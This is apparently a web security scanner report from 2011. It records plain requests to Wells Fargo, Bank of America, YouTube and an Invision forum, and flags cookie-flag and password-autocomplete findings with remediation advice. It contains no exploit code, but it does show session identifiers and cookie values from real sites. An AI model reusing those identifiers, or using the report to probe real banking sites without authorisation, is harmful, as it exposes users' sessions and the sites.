HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo - Apply for an Acc ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/brokerage_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/product ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/deposit_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/pll_select HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:56 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rates/rates_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-length: 4031 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /savings_cds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-length: 10180 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /savings_cds/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open a Savings Account or CD</ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /savings_cds/cds HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11464 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>CD Account - Find the Best CD ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:02 GMT Content-type: text/html; charset=utf-8 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sitemap HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-length: 11525 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Sitemap</title> <meta name=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /student/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Content-length: 11102 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /student/loans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:45 GMT Location: https://www.wellsfargo.com/student/apply Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/student ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /theprivatebank/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 10631 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/autoloans/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:12 GMT Content-length: 4590 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/insurance HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:13 GMT Content-length: 5083 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 4878 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wf/product/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT X-Cnection: close Location: https://www.wellsfargo.com:443/customerApp/product/apply Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure Content-Language: en Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com:443/cus ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wfonline/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 10682 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wfonline/bill_pay/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:32 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Online - Bill Pay< ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 See Other Date: Thu, 03 Feb 2011 01:17:43 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: VISITOR_INFO1_LIVE=XJ-WTjH7UMA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:43 GMT Set-Cookie: GEO=61c81e28805bccac540fef7fe21d6dafcwsAAAAzVVOtwdbzTUoCNw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=tPkJgKGgiVxR6VkyDxY0jMxu78qvhsjgoVr5s_OceJDQL_gh8WA3DK0wRe7SuQUcEQAF3en5aCBxUZe2i0H_Uofu5XRfNzNbj2jrlPvXTLDTPY8C_VQ_zsdHASZNpsQr-KXA7tSvZWfgU_4a1hlfLTkjpIknV7Cl1-2DLxGPithWt5ElD7hFmCXFR8gZVhBZOSKLuqeNRgqcMWiQeKdObub0ZNOc-1n1VomUbzwuBxm29IkoaDB3UA_wKtjbqiJ_amyjAQEZhbJaIA8HZAcU4ENpdzK6ncp3ZJ01PYBydW7KX5cIkc2Zvw Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /promos/jump/greatdeals/ HTTP/1.1 Host: www2.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:30:12 GMT Content-type: magnus-internal/cold-fusion Set-Cookie: SMIDENTITY=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; path=/; domain=.bankofamerica.com; secure Location: http://www.bankofamerica.com/promos/jump/greatdeals2/?dbgredir= Connection: close
12. Password field with autocomplete enabled
There are 32 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
password
Request
GET /index.php?app=core&module=global&section=login HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The form contains the following password field with autocomplete enabled:
password
Request
